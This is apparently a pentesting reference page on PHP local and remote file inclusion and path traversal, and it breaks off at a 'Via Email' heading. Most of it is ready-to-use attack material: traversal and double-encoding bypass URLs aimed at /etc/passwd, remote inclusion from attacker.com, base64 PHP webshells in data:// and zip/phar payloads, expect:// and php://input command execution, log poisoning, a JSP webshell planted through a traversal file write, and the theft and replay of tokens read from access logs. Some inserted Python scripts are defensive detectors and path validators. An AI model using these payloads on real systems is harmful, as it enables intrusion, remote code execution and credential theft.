File Inclusion/Path traversal
File Inclusion
Remote File Inclusion (RFI): The file is loaded from a remote server (best case: you can write the code and the server will execute it). In PHP this is disabled by default (allow_url_include).
Local File Inclusion (LFI): The server loads a local file.
The vulnerability occurs when the user can control in some way the file that is going to be loaded by the server.
Vulnerable PHP functions: require, require_once, include, include_once
A good tool to exploit this vulnerability: https://github.com/kurobeats/fimap
Blind - Interesting - LFI2RCE files
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
Linux
Mixing several *nix LFI lists and adding more paths I have created this one:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
Try also to change / for \
Try also to add ../../../../../
A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found here
Windows
Merge of different wordlists:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
Try also to change / for \
Try also to remove C:/ and add ../../../../../
A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found here
OS X
Check the LFI list of Linux.
Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion too (page=http://myserver.com/phpshellcode.txt).
http://example.com/index.php?page=../../../etc/passwd
traversal sequences stripped non-recursively
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
Null byte (%00)
Bypass the appending of more chars at the end of the provided string (bypass of: $_GET['param']."php")
http://example.com/index.php?page=../../../etc/passwd%00
This is solved since PHP 5.4
Encoding
You could use non-standard encodings like double URL encoding (and others):
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
HTML-to-PDF SVG/IMG path traversal
Modern HTML-to-PDF engines (e.g. TCPDF or wrappers such as html2pdf) happily parse attacker-provided HTML, SVG, CSS, and font URLs, yet they run inside trusted backend networks with filesystem access. Once you can inject HTML into $pdf->writeHTML()/Html2Pdf::writeHTML(), you can often exfiltrate local files that the web server account can read.
- Fingerprint the renderer: every generated PDF carries a Producer field (e.g. TCPDF 6.8.2). Knowing the exact build tells you which path filters exist and whether URL decoding happens before validation.
- Inline SVG payloads: TCPDF::startSVGElementHandler() reads the xlink:href attribute of <image> elements before running urldecode(). Embedding the malicious SVG inside a data URI makes most HTML sanitizers ignore the payload while TCPDF still parses it:
<img src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMCAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxpbWFnZSB4bGluazpocmVmPSIuLi8uLi8uLi8uLi8uLi90bXAvdXNlcl9maWxlcy91c2VyXzEvcHJpdmF0ZV9pbWFnZS5wbmciIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiLz48L3N2Zz4=" />
TCPDF prefixes $_SERVER['DOCUMENT_ROOT'] to paths starting with / and only resolves .. afterwards, so use segments starting with ../../.. or /../../.. to escape the root after the prefix is added.
- Encoding to bypass weak filters: versions ≤6.8.2 only check for the literal substring ../ before URL-decoding. Sending ..%2f (or ..%2F) in the SVG or in a raw <img src> attribute passes the check, because the dot-dot-slash traversal sequence is only reconstructed after TCPDF calls urldecode().
- Double-encoding for multi-stage decoding: if the user input is decoded both by the web framework and by TCPDF, double-encode the slash (%252f). The first decode turns it into %2f, the second decode inside TCPDF turns it into /, yielding /..%252f.. → /../../../… without ever showing ../ to the early filter.
- HTML <img> handler: TCPDF::openHTMLTagHandler() has the same order-of-operations bug, allowing direct HTML payloads such as src="%2f..%252f..%252ftmp%252fsecret.png" to read any locally reachable bitmap.
This technique leaks anything the PDF worker can read (passport scans, API keys rendered as images, etc.). The fix landed in 6.9.1 with proper path canonicalisation (isRelativePath()), so when testing prefer an older Producer version.
From an existing folder
Maybe the back-end is checking the folder path:
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
Exploring File System Directories on a Server
The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:
- Determine Directory Depth: Determine the depth of your current directory by successfully fetching the /etc/passwd file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
http://example.com/index.php?page=../../../etc/passwd # depth of 3
- Probe for Folders: Append the name of the suspected folder (e.g., private) to the URL, then navigate back to /etc/passwd. The additional directory level requires incrementing the depth by one:
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
- Interpret the Outcomes: The server's response indicates whether the folder exists:
  - Error / No Output: The folder private likely does not exist at the specified location.
  - Contents of /etc/passwd: The presence of the private folder is confirmed.
- Recursive Exploration: Discovered folders can be further probed for subdirectories or files using the same technique or traditional Local File Inclusion (LFI) methods.
To explore directories at different locations in the file system, adjust the payload accordingly. For instance, to check whether /var/www/ contains a private directory (assuming the current directory is at a depth of 3), use:
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
Path Truncation Technique
Path truncation is a method employed to manipulate file paths in web applications. It is often used to access restricted files by bypassing security measures that append additional characters to the end of file paths. The goal is to craft a file path that, once altered by the security measure, still points to the desired file.
In PHP, various representations of a file path can be considered equivalent due to the nature of the file system. For instance:
- /etc/passwd, /etc//passwd, /etc/./passwd, and /etc/passwd/ are all treated as the same path.
- When the last 6 characters are passwd, appending a / (making it passwd/) doesn't change the targeted file.
- Similarly, if .php is appended to a file path (like shellcode.php), adding a /. at the end will not alter the file being accessed.
The provided examples demonstrate how to utilize path truncation to access /etc/passwd, a common target due to its sensitive content (user account information):
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
In these scenarios, the number of traversals needed might be around 2027, but this number can vary based on the server's configuration.
- Using Dot Segments and Additional Characters: Traversal sequences (../) combined with extra dot segments and characters can be used to navigate the file system, effectively ignoring strings appended by the server.
- Determining the Required Number of Traversals: Through trial and error, one can find the precise number of ../ sequences needed to navigate to the root directory and then to /etc/passwd, ensuring that any appended strings (like .php) are neutralized while the desired path (/etc/passwd) remains intact.
- Starting with a Fake Directory: It is common practice to begin the path with a non-existent directory (like a/). This technique is used as a precautionary measure or to satisfy the server's path parsing logic.
When employing path truncation techniques, it is crucial to understand the server's path parsing behaviour and file system structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.
This vulnerability was corrected in PHP 5.3.
Filter bypass tricks
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter
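As an added example (not part of the original page), the following Python script shows the defender's side of the encoding and filter-bypass variants listed above: it decodes a request path the way a lenient stack eventually would (repeated URL decoding, the overlong UTF-8 slash, backslashes), checks for traversal on the decoded form (the order the TCPDF bug above got wrong), and runs that over a few constructed access-log lines. The log lines, function names and regexes are mine, not from any real server.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from a real server). They cover the
# variants discussed above: plain traversal, '....//' against a non-recursive
# strip, double URL encoding, the overlong UTF-8 slash %c0%af, encoded
# backslashes and a php:// wrapper. The last line is a benign look-alike.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1420
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 1420
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1420
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd HTTP/1.1" 200 1420
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /static/%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1" 404 0
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=PhP://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /docs/release-notes..html HTTP/1.1" 200 200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# A stream-wrapper scheme at the start of a value (page=php://..., page=data:...).
WRAPPER_RE = re.compile(r'(?:^|[?&=])(?:php|data|expect|phar|zip|rar|glob):', re.I)


def normalize(path: str, max_rounds: int = 3) -> str:
    """Canonicalise a request path the way the filesystem will eventually see it.

    Decoding happens *before* any check: repeated unquote() collapses
    %252f -> %2f -> /, the overlong UTF-8 slash %c0%af is mapped to '/',
    and backslashes are folded to '/'.
    """
    s = path
    for _ in range(max_rounds):
        s = re.sub(r'%c0%af', '/', s, flags=re.I)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace('\\', '/')


def has_traversal(norm: str) -> bool:
    """True if a '..' path *segment* is present.

    Checking segments (not the substring '..') keeps 'release-notes..html'
    clean. The once-stripped form is tested too, because an application that
    removes '../' non-recursively turns '....//' into '../'.
    """
    for candidate in (norm, norm.replace('../', '')):
        if '..' in candidate.split('/'):
            return True
    return False


def classify(path: str) -> list:
    """Return the reasons a request path looks like an LFI/traversal attempt."""
    norm = normalize(path)
    reasons = []
    if has_traversal(norm):
        reasons.append('dot-dot traversal')
    if unquote(unquote(path)) != unquote(path):
        reasons.append('double URL encoding')
    if re.search(r'%c0%af|%5c|\\', path, re.I):
        reasons.append('non-canonical slash')
    if WRAPPER_RE.search(norm):
        reasons.append('php stream wrapper')
    return reasons


def scan_log(text: str) -> list:
    """Return [(request_path, reasons)] for every suspicious request line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            reasons = classify(m.group(1))
            if reasons:
                findings.append((m.group(1), reasons))
    return findings


if __name__ == '__main__':
    for request_path, why in scan_log(SAMPLE_LOG):
        print(f'{request_path}\n    -> {", ".join(why)}')
```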
Remote File Inclusion
In PHP this is disabled by default because allow_url_include is Off. It must be On for it to work, and in that case you could include a PHP file from your server and get RCE:
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
If for some reason allow_url_include is On, but PHP is filtering access to external web pages, according to this post, you could use for example the data protocol with base64 to decode a b64 PHP code and get RCE:
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
Tip
In the previous code, the final +.txt was added because the attacker needed a string that ended in .txt, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
Another example not using the php:// protocol would be:
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
Python Root element
In Python, in a code like this one:
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
If the user passes an absolute path to file_name, the previous path is just removed:
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
This is the intended behaviour according to the docs:
If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
Java List Directories
It looks like if you have a Path Traversal in Java and you ask for a directory instead of a file, a listing of the directory is returned. This won't happen in other languages (as far as I know).
Top 25 parameters
Here's a list of the top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link):
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
LFI / RFI using PHP wrappers & protocols
php://filter
PHP filters allow performing basic modification operations on the data before it is read or written. There are 5 categories of filters:
- String Filters:
  - string.rot13
  - string.toupper
  - string.tolower
  - string.strip_tags: Remove tags from the data (everything between "<" and ">" characters). Note that this filter has been removed from modern PHP versions
- Conversion Filters:
  - convert.base64-encode
  - convert.base64-decode
  - convert.quoted-printable-encode
  - convert.quoted-printable-decode
  - convert.iconv.*: Transforms to a different encoding (convert.iconv.<input_enc>.<output_enc>). To get the list of all the supported encodings run in the console: iconv -l
Warning
Abusing the convert.iconv.* conversion filter you can generate arbitrary text, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check LFI2RCE via php filters.
- Compression Filters:
  - zlib.deflate: Compress the content (useful if exfiltrating a lot of info)
  - zlib.inflate: Decompress the data
- Encryption Filters:
  - mcrypt.*: Deprecated
  - mdecrypt.*: Deprecated
- Other Filters:
  - Running var_dump(stream_get_filters()); in PHP you can find a couple of unexpected filters:
    - consumed
    - dechunk: reverses HTTP chunked encoding
    - convert.*
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.strip_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");
# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");
# Compression Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that the PHP protocol is case-insensitive (meaning you can use "PhP://" or any other variant)
Warning
The "php://filter" part is case insensitive
Using php filters as oracle to read arbitrary files
In this post a technique is proposed to read a local file without having the output returned by the server. The technique is based on a boolean exfiltration of the file (char by char) using php filters as an oracle. This is possible because php filters can be used to make a text big enough to make PHP throw an exception.
In the original post you can find a detailed explanation of the technique, but here is a quick summary:
- Use the codec UCS-4LE to leave the leading character of the text at the beginning and make the size of the string increase exponentially.
- This will be used to generate a text so big when the initial letter is guessed correctly that PHP will trigger an error.
- The dechunk filter will remove everything if the first char is not hexadecimal, so we can know if the first char is hex.
- This, combined with the previous one (and other filters depending on the guessed letter), will allow us to guess a letter at the beginning of the text by seeing when we apply enough transformations to make it not be a hexadecimal character. Because if it is hex, dechunk won't delete it and the initial bomb will make PHP error.
- The codec convert.iconv.UNICODE.CP930 transforms every letter into the following one (so after this codec: a -> b). This allows us to discover if the first letter is an a, for example, because if we apply this codec 6 times a->b->c->d->e->f->g the letter is no longer a hexadecimal character, therefore dechunk doesn't delete it and the PHP error is triggered because it multiplies with the initial bomb.
- Using other transformations like rot13 at the beginning it is possible to leak other chars like n, o, p, q, r (and other codecs can be used to move other letters into the hex range).
- When the initial char is a number it is needed to base64 encode it and leak the first 2 letters to leak the number.
- The final problem is how to leak more than the initial letter. By using order memory filters like convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE it is possible to change the order of the chars and get other letters of the text into the first position.
- And in order to obtain further data the idea is to generate 2 bytes of junk data at the beginning with convert.iconv.UTF16.UTF16, apply UCS-4LE to make it pivot with the next 2 bytes, and delete the data until the junk data (this will remove the first 2 bytes of the initial text). Continue doing this until you reach the desired bit to leak.
In the post a tool to perform this automatically was also released: php_filters_chain_oracle_exploit.
php://fd
This wrapper allows access to file descriptors that the process has open. Potentially useful to exfiltrate the content of opened files:
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
You can also use php://stdin, php://stdout and php://stderr to access the file descriptors 0, 1 and 2 respectively (not sure how this could be useful in an attack)
zip:// and rar://
Upload a Zip or Rar file with a PHPShell inside and access it.
To be able to abuse the rar protocol it needs to be activated specifically.
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php
data://
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Note that this protocol is restricted by the php configurations allow_url_open and allow_url_include
expect://
Expect has to be activated. You can execute code using this:
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
input://
Specify your payload in the POST parameters:
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
phar://
A .phar file can be utilized to execute PHP code when a web application leverages functions such as include for file loading. The PHP code snippet provided below demonstrates the creation of a .phar file:
<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
To create the .phar file, the following command should be executed:
php --define phar.readonly=0 create_path.php
Upon execution, a file named test.phar will be created, which could potentially be leveraged to trigger Local File Inclusion (LFI).
In cases where the LFI only performs file reading without executing the PHP code within, through functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the phar protocol.
For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:
Phar Deserialization Exploitation Guide
CVE-2024-2961
It was possible to abuse any arbitrary file read from PHP that supports php filters to get RCE. The detailed description can be found in this post.
Quick summary: a 3 byte overflow in the PHP heap was abused to alter the chain of free chunks of a specific size in order to be able to write anything to any address, so a hook was added to call system.
It was possible to allocate chunks of specific sizes by abusing more php filters.
More protocols
Check more protocols to include here:
- php://memory and php://temp — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
- file:// — Accessing local filesystem
- http:// — Accessing HTTP(s) URLs
- ftp:// — Accessing FTP(s) URLs
- zlib:// — Compression Streams
- glob:// — Find pathnames matching pattern (it doesn't return anything printable, so not really useful here)
- ssh2:// — Secure Shell 2
- ogg:// — Audio streams (not useful to read arbitrary files)
LFI via PHP's 'assert'
Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.
For example, PHP code might be designed to prevent directory traversal like so:
assert("strpos('$file', '..') === false") or die("");
While this aims to stop traversal, it inadvertently creates a vector for code injection. To exploit this for reading file contents, an attacker could use:
' and die(highlight_file('/etc/passwd')) or '
Similarly, for executing arbitrary system commands, one might use:
' and die(system("id")) or '
It is important to URL-encode these payloads.
PHP Blind Path Traversal
Warning
This technique is relevant in cases where you control the file path of a PHP function that will access a file but you won't see the content of the file (like a simple call to file()) as the content isn't shown.
In this incredible post it is explained how a blind path traversal can be abused via PHP filter to exfiltrate the content of a file via an error oracle.
In summary, the technique uses the "UCS-4LE" encoding to make the content of the file so big that the PHP function opening the file will trigger an error.
Then, in order to leak the first char the filter dechunk is used along with others such as base64 or rot13, and finally the filters convert.iconv.UCS-4.UCS-4LE and convert.iconv.UTF16.UTF-16BE are used to place other chars at the beginning and leak them.
Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs
For the technical details check the mentioned post!
LFI2RCE
Arbitrary File Write via Path Traversal (Webshell RCE)
When server-side code that receives/uploads files builds the destination path using user-controlled data (e.g., filename or URL) without canonicalising and validating it, .. segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell.
Typical exploitation workflow:
- Identify a write primitive in an endpoint or background worker that accepts a path/filename and writes content to disk (e.g., message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
- Determine web-exposed directories. Common examples:
  - Apache/PHP: /var/www/html/
  - Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
  - IIS: C:\inetpub\wwwroot\ → drop shell.aspx
- Craft a traversal path that breaks out of the intended storage directory into the webroot, and include your webshell content.
- Browse to the dropped payload and execute commands.
Notes:
- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
- On Java stacks, these file writes are often implemented with simple File/Paths concatenation. Lack of canonicalisation/allow-listing is the core flaw.
Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
<Command Type="SubmitQueueEntry">
<!-- Write outside the intake folder into the webroot via traversal -->
<Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
<Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
Process p = Runtime.getRuntime().exec(c);
try (var in = p.getInputStream(); var out = response.getOutputStream()) {
in.transferTo(out);
}
}
%>
]]>
</Data>
</Command>
</JMF>
Hardening that defeats this class of bugs:
- Resolve to a canonical path and enforce that it is a descendant of an allow-listed base directory.
- Reject any input containing .., absolute roots, or drive letters; prefer generated filenames.
- Run the writer as a low-privileged account and segregate write directories from served roots.
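The following Python helper is an added example, not the page's or any project's code. It ties the os.path.join behaviour from the Python section earlier on this page to the three hardening points just listed (canonicalise, enforce containment, reject .. / absolute roots / drive letters); the base directory and file names are constructed.

```python
import os
import ntpath
import posixpath
import re


class UnsafePathError(ValueError):
    """Raised when user input would leave the allowed base directory."""


def naive_join(base: str, user_path: str) -> str:
    """The pattern from the Python section: os.path.join discards every earlier
    component as soon as one component is absolute (posixpath used so the
    result is the same on any host)."""
    return posixpath.join(base, "public", user_path)


def naive_join_windows(base: str, user_path: str) -> str:
    """Same weakness with Windows semantics: a drive letter resets the path."""
    return ntpath.join(base, "public", user_path)


def safe_join(base_dir: str, user_path: str) -> str:
    """Resolve user_path strictly inside base_dir or raise UnsafePathError.

    Implements the hardening points above: reject '..', absolute roots and
    drive letters up front, then canonicalise and enforce that the result is
    a descendant of the canonical base. Run this after any URL decoding the
    framework performs, never before it.
    """
    if not user_path or "\x00" in user_path:
        raise UnsafePathError("empty path or NUL byte")
    # Treat backslashes as separators so Windows-style input cannot hide segments.
    normalized = user_path.replace("\\", "/")
    if normalized.startswith("/") or re.match(r"^[A-Za-z]:", normalized):
        raise UnsafePathError(f"absolute root or drive letter rejected: {user_path!r}")
    segments = [s for s in normalized.split("/") if s not in ("", ".")]
    if not segments:
        raise UnsafePathError("no file name given")
    if ".." in segments:
        raise UnsafePathError(f"dot-dot segment rejected: {user_path!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, *segments))
    # Containment on canonical paths: realpath resolves symlinks, so a link
    # inside base that points outside it is caught here as well.
    if os.path.commonpath([base, target]) != base:
        raise UnsafePathError(f"escapes base directory: {user_path!r}")
    return target


def is_safe(base_dir: str, user_path: str) -> bool:
    """Boolean wrapper around safe_join for callers that only need a verdict."""
    try:
        safe_join(base_dir, user_path)
        return True
    except UnsafePathError:
        return False


if __name__ == "__main__":
    print(naive_join("/srv/app", "/etc/passwd"))             # /etc/passwd
    print(naive_join_windows("C:\\app", "D:\\secret.txt"))   # D:\secret.txt
    for candidate in ("reports/q1.pdf", "../../etc/passwd", "/etc/passwd",
                      "a/../../x", "C:/windows/win.ini", "img\\..\\..\\secret"):
        verdict = "ok" if is_safe("/srv/app/public", candidate) else "REJECTED"
        print(f"{candidate!r:28} -> {verdict}")
```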
Remote File Inclusion
Explained previously, follow this link.
Via Apache/Nginx log file
If the Apache or Nginx server is vulnerable to LFI inside the include function you could try to access /var/log/apache2/access.log or /var/log/nginx/access.log, set inside the user agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?> and include that file
Warning
Note that if you use double quotes for the shell instead of simple quotes, the double quotes will be modified for the string “quote;”, PHP will throw an error there and nothing else will be executed.
Also, make sure you write the payload correctly or PHP will error every time it tries to load the log file and you won't have a second opportunity.
This could also be done in other logs but be careful, the code inside the logs could be URL encoded and this could destroy the Shell. The "basic" authorisation header contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.
Other possible log paths:
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
Read access logs to harvest GET-based auth tokens (token replay)
Many applications mistakenly accept session/auth tokens via GET (e.g., AuthenticationToken, token, sid). If you have a path traversal/LFI primitive to web server logs, you can steal those tokens from the access logs and replay them to bypass authentication completely.
How to:
- Use traversal/LFI to read the web server access log. Common locations:
  - /var/log/apache2/access.log, /var/log/httpd/access_log
  - /var/log/nginx/access.log
- Sometimes endpoints return file reads Base64-encoded. If so, decode locally and inspect the log lines.
- grep for GET requests that include the token parameter and capture its value, then replay it against the application entry point.
Example flow (generic):
GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target
Decode the body if it is Base64, then replay the captured token:
GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target
Vidokezo:
- Tokens in URLs are logged by default; never accept bearer tokens via GET in production systems.
- If the app supports multiple token names, search for common keys like AuthenticationToken, token, sid, access_token.
- Rotate any tokens that may have leaked to logs.
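As an added example (not part of the original write-up), this Python audit implements the defender's side of the notes above: it finds token-like parameters in the GET query strings of access-log lines, so the owners know which tokens to rotate, and redacts the values before the logs are stored or shipped. The log lines and token values are constructed; the parameter names are the ones listed in the notes.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Parameter names from the notes above, compared case-insensitively.
TOKEN_KEYS = {"authenticationtoken", "token", "sid", "access_token"}

# Constructed access-log lines (not from a real server); the token values
# are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jan/2024:09:15:00 +0000] "GET /portalhome/?AuthenticationToken=tok-CONSTRUCTED-0001 HTTP/1.1" 200 2310
203.0.113.7 - - [02/Jan/2024:09:15:02 +0000] "GET /static/app.js HTTP/1.1" 200 8812
198.51.100.4 - - [02/Jan/2024:09:16:10 +0000] "GET /api/items?sid=sid-CONSTRUCTED-0002&page=2 HTTP/1.1" 200 512
198.51.100.4 - - [02/Jan/2024:09:16:12 +0000] "POST /login HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def token_pairs(request_target: str):
    """Yield (key, value) for every query parameter whose name is token-like."""
    for key, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        if key.lower() in TOKEN_KEYS and value:
            yield key, value


def find_leaked_tokens(text: str) -> list:
    """Return [(line_no, key, value)] for every token that reached the log.

    This is the audit that decides which tokens must be rotated: anything
    listed here has been readable by whoever could read the log file.
    """
    leaks = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            for key, value in token_pairs(m.group(1)):
                leaks.append((line_no, key, value))
    return leaks


def redact_line(line: str) -> str:
    """Replace token values with [REDACTED] so a later read of the log
    (via LFI or a log shipper) never yields a usable credential."""
    m = REQUEST_RE.search(line)
    if not m:
        return line
    parts = urlsplit(m.group(1))
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if not any(k.lower() in TOKEN_KEYS for k, _ in pairs):
        return line
    cleaned = [(k, "[REDACTED]" if k.lower() in TOKEN_KEYS else v) for k, v in pairs]
    new_target = urlunsplit(parts._replace(query=urlencode(cleaned, safe="[]")))
    return line.replace(m.group(1), new_target, 1)


def redact_log(text: str) -> str:
    """Redact every line of an access log."""
    return "\n".join(redact_line(line) for line in text.splitlines())


if __name__ == "__main__":
    for line_no, key, value in find_leaked_tokens(SAMPLE_LOG):
        print(f"line {line_no}: {key}={value}  (rotate this token)")
    print(redact_log(SAMPLE_LOG))
```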
Via Email
